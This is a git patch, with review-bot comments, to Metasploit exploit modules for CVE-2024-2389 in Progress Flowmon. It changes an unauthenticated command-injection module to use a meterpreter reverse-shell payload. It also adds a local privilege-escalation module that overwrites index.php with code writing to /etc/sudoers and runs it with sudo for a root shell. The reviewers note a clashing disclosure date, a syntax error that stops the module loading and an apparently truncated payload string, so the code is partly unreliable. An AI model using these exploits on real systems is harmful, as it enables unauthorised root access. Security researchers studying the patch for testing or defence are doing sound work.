From 40548fa7cf0d28c40547a6e3b9834e16481b9f23 Mon Sep 17 00:00:00 2001
From: DaveYesland
Date: Tue, 30 Apr 2024 14:30:34 -0700
Subject: [PATCH] Update msf modules

---
 .../progress_flowmon_unauth_cmd_injection.rb | 26 +------
 .../local/progress_flowmon_sudo_privesc.rb | 78 +++++++++++++++++++
 2 files changed, 82 insertions(+), 22 deletions(-)
 rename CVE-2024-2389/metasploit/{ => exploits/linux/http}/progress_flowmon_unauth_cmd_injection.rb (72%)
 create mode 100644 CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb

diff --git a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb b/CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
similarity index 72%
rename from CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb
rename to CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
index 851b9fe..95eb8c3 100644
--- a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb
+++ b/CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
@@ -26,19 +26,19 @@ def initialize(info = {})
 ['CVE', 'CVE-2024-2389'],
 ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
 ],
- 'DisclosureDate' => '2024',
+ 'DisclosureDate' => '2024-04-23',
 'Notes' => {
 'Stability' => [ CRASH_SAFE ],
 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
 'Reliability' => [ REPEATABLE_SESSION ]
 },
 'Platform' => ['unix', 'linux'],
- 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Arch' => [ARCH_CMD],
 'Targets' => [['Automatic', {}]],
 'Privileged' => false,
 'DefaultOptions' => {
- 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp',
+ 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
 'SSL' => true,
 'RPORT' => 443
 },
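Review bot: The new `'DisclosureDate' => '2024-04-23'` in this hunk does not agree with the `'DisclosureDate' => '2024-03-19'` given for the same CVE-2024-2389 advisory in the local privesc module added later in this patch; confirm which date the vendor advisory supports and use it in both modules. Both modules cite the same kemptechnologies advisory URL, so they presumably should carry the same date.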
@@ -46,8 +46,7 @@ def initialize(info = {})
 )
 register_options([
- OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']),
- OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true])
+ OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])
 ])
 end
@@ -68,23 +67,6 @@ def exploit
 execute_command(payload.encoded)
 end
- def on_new_session(session)
- if datastore['PRIVESC']
- execute_privesc_command(session)
- else
- print_status('Privilege escalation skipped.')
- end
- end
-
- def execute_privesc_command(session)
- print_status("Executing privilege escalation command...")
- session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;')
- session.shell_command('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
- session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
- session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;')
- print_status('You should be able to use "sudo -i" for a root shell...')
- end
-
 def check
 print_status("Checking if #{peer} can be exploited!")
diff --git a/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb b/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb
new file mode 100644
index 0000000..fc41ab1
--- /dev/null
+++ b/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb
@@ -0,0 +1,78 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Post::File
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Progress Flowmon Local sudo privilege escalation',
+ 'Description' => %q{
+ This module abuses a feature of the sudo command on Progress Flowmon.
+ Certain binary files are allowed to automatically elevate
+ with the sudo command. This is based off of the file name. This
+ includes executing a PHP command with a specific file name. If the
+ file is overwritten with PHP code it can be used to elevate privileges
+ to root.
+ },
+ 'Author' => [
+ 'Dave Yesland with Rhino Security Labs',
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/']
+ ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
+ ],
+ 'DisclosureDate' => '2024-03-19',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE ],
+ 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+ 'Reliability' => [ REPEATABLE_SESSION ]
+ },
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' => [['Automatic', {}]],
+ 'Privileged' => true,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+ }
+ )
+ )
+ end
+
+ def check
+ score = 0
+ score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon')
+ score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
+ score += 1 if exists?('/var/www/shtml/translate.php')
+ vprint_status("Found #{score} indicators this is a Progress Flowmon product")
+ return CheckCode::Detected if score > 0
+
+ return CheckCode::Safe
+ end
+
+ def exploit
+
+ begin
+ vprint_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
+ cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
+ vprint_status('Overwriting /var/www/shtml/index.php with payload')
+ cmd_exec('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
+ vprint_status('Executing sudo to elevate privileges')
+ cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
+ vprint_status('Replacing index.php with original file')
+ cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
+ vprint_status('You should be able to use "sudo -i" for a root shell...')
+ end
+ end
+ end
\ No newline at end of file
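Review bot: The two `['URL', …]` entries under `'References'` have no comma between them, so Ruby does not parse this as a two-element array and the module will not load as written; add a trailing comma after the first entry. In `check`, `read_file` can return nil when the path is absent, and calling `.include?` on nil raises instead of falling through to `CheckCode::Safe` — use `read_file('/var/www/shtml/index.php').to_s.include?('FlowMon')` and the same `.to_s` on the manifest.json line. The `begin … end` wrapper in `exploit` carries no `rescue` or `ensure` clause and can be dropped without changing behaviour. The string passed to the `echo` `cmd_exec` appears truncated as rendered here (an opening quote with nothing before `> /etc/sudoers`), which may be an extraction artifact; confirm against the committed file.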